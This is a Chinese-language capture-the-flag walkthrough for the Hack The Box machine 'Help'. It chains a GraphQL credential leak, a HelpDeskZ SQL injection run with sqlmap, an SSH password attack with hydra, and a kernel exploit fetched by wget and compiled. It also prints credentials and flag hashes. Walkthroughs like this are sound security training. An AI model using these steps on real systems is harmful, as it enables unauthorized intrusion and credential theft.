[Meachines] [Easy] Help HelpDeskZ-SQLI+NODE.JS-GraphQL未授权访问+Kernel<4.4.0权限提升

Information Gathering

IP Address Opening Ports
10.10.10.121 TCP:22,80,3000

$ sudo masscan -p1-65535,U:1-65535 10.10.10.121 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.10.121

bash 复制代码
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://help.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

HelpDeskZ

# echo '10.10.10.121 help.htb' >> /etc/hosts

$ dirsearch -u http://help.htb/

http://help.htb/support

NODE.JS && GraphQL 未授权访问

$ whatweb http://10.10.10.121:3000 -v

$ curl -s -G http://10.10.10.121:3000/graphql --data-urlencode "query={user}"

错误提示你需要用 { ... } 明确列出需要从 user 中获取的具体字段。

$ curl -s -G http://10.10.10.121:3000/graphql --data-urlencode "query={user{username,password}}"

username:helpme@helpme.com
password:godhelpmeplz

HelpDeskZ SQLI

复制代码
GET /support/?v=view_tickets&action=ticket&param[]=8&param[]=attachment&param[]=1&param[]=10 HTTP/1.1
Host: help.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://help.htb/support/?v=view_tickets&action=ticket&param[]=8
Cookie: lang=english; PHPSESSID=ri7q0rqtnbcvmistdqr006vig1; usrhash=0Nwx5jIdx%2BP2QcbUIv9qck4Tk2feEu8Z0J7rPe0d70BtNMpqfrbvecJupGimitjg3JjP1UzkqYH6QdYSl1tVZNcjd4B7yFeh6KDrQQ%2FiYFsjV6wVnLIF%2FaNh6SC24eT5OqECJlQEv7G47Kd65yVLoZ06smnKha9AGF4yL2Ylo%2BGMn4sO7fCgec6Z%2FXLV%2BAwXfx35QvIDTO%2FSMYMFINSxIA%3D%3D
Upgrade-Insecure-Requests: 1

$ sqlmap -r target -p param[] --level 5 --risk 3 --batch

$ sqlmap -r target -p param[] --level 5 --risk 3 --batch -D support -T staff --dump

$ hydra -L usernames -p Welcome1 ssh://10.10.10.121

username:help
password:Welcome1

$ ssh help@10.10.10.121

User.txt

ae3b7cd906a806d72bf78a3c751c2533

Privilege Escalation: Linux Kernel < 4.4.0-116

https://www.exploit-db.com/exploits/44298

$ wget http://10.10.16.13/ker.c

$ gcc ker.c -o ker

$ chmod +x ker

Root.txt

314e5296badc1deb6632c86af6298d1b

相关推荐
爱勇宝38 分钟前
第 1 章:别把“需求文档”当成真正的需求
前端·后端·程序员
IT_陈寒5 小时前
闭包陷阱让我加了两天班,JavaScript你真行
前端·人工智能·后端
易协同低代码6 小时前
通达OA核心类库TD类深度解析
后端
Gopher_HBo6 小时前
Go语言学习笔记(十八)Gin处理Session
后端
谭光志7 小时前
工具塞满上下文窗口怎么办?深度拆解 AI Agent Tool Search 按需加载实现原理
前端·后端·ai编程
她说..7 小时前
Java 默认值设置方式
java·开发语言·后端·springboot
foggyprojects7 小时前
从0开始,一句话启动AI DataAgent
后端·数据分析·ai编程
郡杰7 小时前
一些基础和问题解决
后端
陈随易8 小时前
前端项目部署只要30秒
前端·后端·程序员
YIAN8 小时前
从零手写文件读取 MCP 服务:一文吃透 Model Context Protocol 全链路通信原理
前端·后端·mcp